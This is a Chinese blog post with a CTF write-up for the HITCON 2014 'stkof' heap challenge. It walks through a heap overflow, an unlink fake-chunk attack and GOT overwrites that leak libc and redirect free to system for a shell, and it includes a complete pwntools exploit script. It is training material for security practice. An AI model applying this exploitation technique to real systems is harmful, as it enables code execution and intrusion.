unlink 2014 HITCON stkof

最新推荐文章于 2022-02-28 22:38:06 发布
最新推荐文章于 2022-02-28 22:38:06 发布
阅读量2.5k 收藏
点赞数
分类专栏: pwn 文章标签: pwn 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36918532/article/details/122535326
版权

题目可以从buuctf下载
参考链接有两篇:一篇使我们的靶场里面的内网服务器的文章链接就不贴了:他所使用的原理是通过atoi函数来达到获取shell的,另外一篇通过free-》system https://blog.csdn.net/Pwnpanda/article/details/81369367

首先拿到题目,随便输入发现没有任何提示,,,,在IDA里面仔细看了看,大概看出来
1.用来分配
2用来写入内容
3.用来free
4.好像没什么用

而且发现在输入的时候是没有验证大小的,可以随便输入所以就可以溢出修改下一个堆块
然后free触发unlink,指向指向自己想要的位置
还有就是我们发现S存放的是堆的地址 0x602140
在这里插入图片描述
然后大致思路就有了,通过溢出,然后出发unlink,指向自己能够控制的区域,然后泄露地址,最后获得shell(那么如何泄露地址?我这边采用的方法是使用free@got->put_plt)

首先构造五个堆块 (我这个虚拟机也不知道是更新了还是咋的,中间有好几个堆丢不是我申请的,所以申请五个进行绕过,,其中有个0x1011,0x411)

head = 0x602140   #s location

alloc(0x50) # chunk 1  raoguo 0x411
alloc(0x50)#chunk 2
alloc(0x30) #chunk 3
alloc(0x80) #chunk 4
alloc(0x20) #chunk 5

我们申请堆的地址
在这里插入图片描述

#fake chunk 6  
payload = p64(0)        #prev_size
payload += p64(0x30)  #size
payload += p64(head + 0x18 - 0x18)  #fd ->chunk 3
payload += p64(head + 0x18 - 0x10)  #bk ->chunk 3
payload += p64(0x30)  # next chunk's prev_size bypass the check
payload = payload.ljust(0x30, 'a')

payload += p64(0x30)
# make it believe that prev chunk is free
payload += p64(0x90)
edit(3, len(payload), payload)
gdb.attach(p)
free(4) #unlink
p.recvuntil('OK\n')

在这里插入图片描述
为什么伪造在这?因为后面可以控制堆的地址,使其指向我们想要的函数地址,并且在修改堆(就相当于修改那些函数地址)就可以达到我们要的效果

触发了unlink后的结果,可以看到第五块的pre_size变为了0xc0,也就是前两块合并了(0x30+0x80+0x10)
在这里插入图片描述
然后修改分别将ptr1->指向free,ptr2->指向puts

payload = 'a' * 8 + p64(stkof.got['free']) + p64(stkof.got['puts']) + p64(stkof.got['atoi'])
edit(3, len(payload), payload)# &ptr1 = free@got  &ptr2=puts@got

在这里插入图片描述
在这里插入图片描述

然后我们将free@got指向—>puts_plt

payload = p64(stkof.plt['puts'])
edit(1,len(payload),payload) # modify free@got -> put@plt

在这里插入图片描述
然后free(2) 就可以打印出put的地址了
在这里插入图片描述

同样的原理,将free@got—>指向system

payload = p64(system_addr)
edit(1,len(payload), payload)

在这里插入图片描述
然后还缺一个bin_sh,直接修改就可以了,,拿到shell

bin_sh = '/bin/sh\x00'
edit(5,len(bin_sh),bin_sh)

在这里插入图片描述
然后附上所有代码吧

from pwn import *

p = process('./stkof')
#p = remote("node4.buuoj.cn",28033)
stkof = ELF('stkof')
libc = ELF('./libc.so.6')
context.log_level = 'debug'

def alloc(size):
	p.sendline('1')
	p.sendline(str(size))
	p.recvuntil('OK\n')

def edit(idx,size,content):
	p.sendline('2')
	p.sendline(str(idx))
	p.sendline(str(size))
	p.send(content)
	p.recvuntil('OK\n')

def free(idx):
	p.sendline('3')
	p.sendline(str(idx))


head = 0x602140   #s location

alloc(0x50) # chunk 1  raoguo 0x411
alloc(0x50)#chunk 2
alloc(0x30) #chunk 3
alloc(0x80) #chunk 4
alloc(0x20) #chunk 5
#free(3)


#fake chunk 6  
payload = p64(0)        #prev_size
payload += p64(0x30)  #size
payload += p64(head + 0x18 - 0x18)  #fd ->chunk 3
payload += p64(head + 0x18 - 0x10)  #bk ->chunk 3
payload += p64(0x30)  # next chunk's prev_size bypass the check
payload = payload.ljust(0x30, 'a')

payload += p64(0x30)
# make it believe that prev chunk is free
payload += p64(0x90)
edit(3, len(payload), payload)

free(4) #unlink
p.recvuntil('OK\n')

print("free addr is : ",hex(stkof.got['free']))#free 0x602018
print("puts addr is : ",hex(stkof.got['puts']))#static puts 0x602020  changeable 0x7f212da2d6a0
print("atoi addr is : ",hex(stkof.got['atoi']))#atoi 0x602088  	changeable	0x00007f08c6c5be90
print("puts_plt addr is : ",hex(stkof.plt['puts']))#atoi 0x400760  


payload = 'a' * 8 + p64(stkof.got['free']) + p64(stkof.got['puts']) + p64(stkof.got['atoi'])
edit(3, len(payload), payload)# &ptr1 = free@got  &ptr2=puts@got
payload = p64(stkof.plt['puts'])

edit(1,len(payload),payload) # modify free@got -> put@plt

free(2) #print put;
puts_addr = u64(p.recvuntil('\nOK\n', drop=True).ljust(8, '\x00'))

print("addr is :",hex(puts_addr))#0x7f212da2d6a0
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
print("system_addr",hex(system_addr))
payload = p64(system_addr)
edit(1,len(payload), payload)
#gdb.attach(p)
bin_sh = '/bin/sh\x00'
edit(5,len(bin_sh),bin_sh)

free(5)

p.interactive()

在这里插入图片描述

是脆脆啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
stkof
pppp974的博客
09-17 183
from pwn import * p= process("./stkof") libc = ELF("./libc.so.6") elf = ELF("./stkof") def create(size): p.sendline('1') p.sendline(str(size)) p.recvuntil('OK\n') def edit(index,size,content): p...
2014_hitcon_stkof
Maxmalloc的博客
12-13 841
题目链接 这是一道unlink的题,初学者可以通过它入门unlink 先大概了解一下unlink相关的知识点 unlink主要适用于small chunk(>=size>=0x80)和large chunk
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 725
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
buuctf hitcon2014_stkof 4/100
m0_57754423的博客
02-28 139
这个题目之前做过,所有这次并没有什么大问题。 unlink exp: from pwn import * from LibcSearcher import * p = remote("node4.buuoj.cn",28398) context.log_level = "debug" context.arch = "amd64" e = ELF("./stkof") # chunk_addr = 0x602140 def add(size): p.sendline(b"1") p.sendl
hitcon2014_stkof
m0sway的博客
01-12 2884
hitcon2014_stkof 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看,发现是直接可以输入的,什么提示也没有,那么先拉进IDA中看: __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v3; // eax signed int v5; // [rsp+Ch] [rbp-74h] char nptr; // [rsp+10h] [rbp-70h] unsign
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
unlink()函数删除文件 、mkdir()函数创建目录、rmdir()函数删除目录这些方法在文件相关的处理方法会经常使用到,本文整理了一些,需要的朋友可以了解下
堆漏洞之unlink1
08-04
unlink 漏洞利用技巧的核心就在下面这几行代码:SP00F|版权属于我个人所有,你可以用于学习,但不可以用于商业目的漏洞利用的技巧就是覆盖相邻(下一个或下下
Linux unlink函数和删除文件的操作方法
01-09
1. unlink函数   对于硬链接来说,unlink 用来删除目录项,并把 inode 引用计数减 1,这两步也是一个原子过程。直到 inode 引用计数为 0,才会真正删除文件。   对于软链接来说,unlink 直接删除软链接,而不...
php unlink()函数使用教程
10-18
最近在写个网站,需要上传图片,如果修改图片,就图片就没有用了,会占用服务器的硬盘资源,所以想到用unlink函数删除旧照片.下面脚本之家小编给大家带来了php unlink()函数使用教程,感兴趣的朋友一起看看吧
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 665
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 659
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1552
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 799
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
[BUUOJ刷题记录]hitcon2014_stkof 一道Unlink例题
zylxixixi的博客
10-01 283
check一下开启的安全防护,并没有开启PIE 拿到题进行IDA反编译,可以看到有四个函数,对应四种操作,逐个分析。 allocate函数创建一个自定义大小的堆 edit函数自定大小修改堆块的内容,容易产生堆溢出 delete函数就是free堆块 还有一个没有意义的函数 这里比较重要的点是存储堆块地址的数组地址 整体思路为: 申请四个堆块,大小分别为0x1000,0x90,0x80,0x10 一般来说题目会使用setbuf来关闭缓冲区,但由于本题并没有采用s...
writeup hitcon-ctf-2014/stkof
fuchuangbob的专栏
06-12 2152
writeup hitcon-ctf-2014/stkof题目: https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof 漏洞分析可参考: http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/ 使用pwntoo
unlink函数
最新发布
05-24
unlink函数是一个系统调用,用于删除指定的文件名。它的原型如下: ```c #include int unlink(const char *pathname); ``` 其中,pathname表示要删除的文件名。 使用unlink函数删除文件时,需要注意以下几点: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值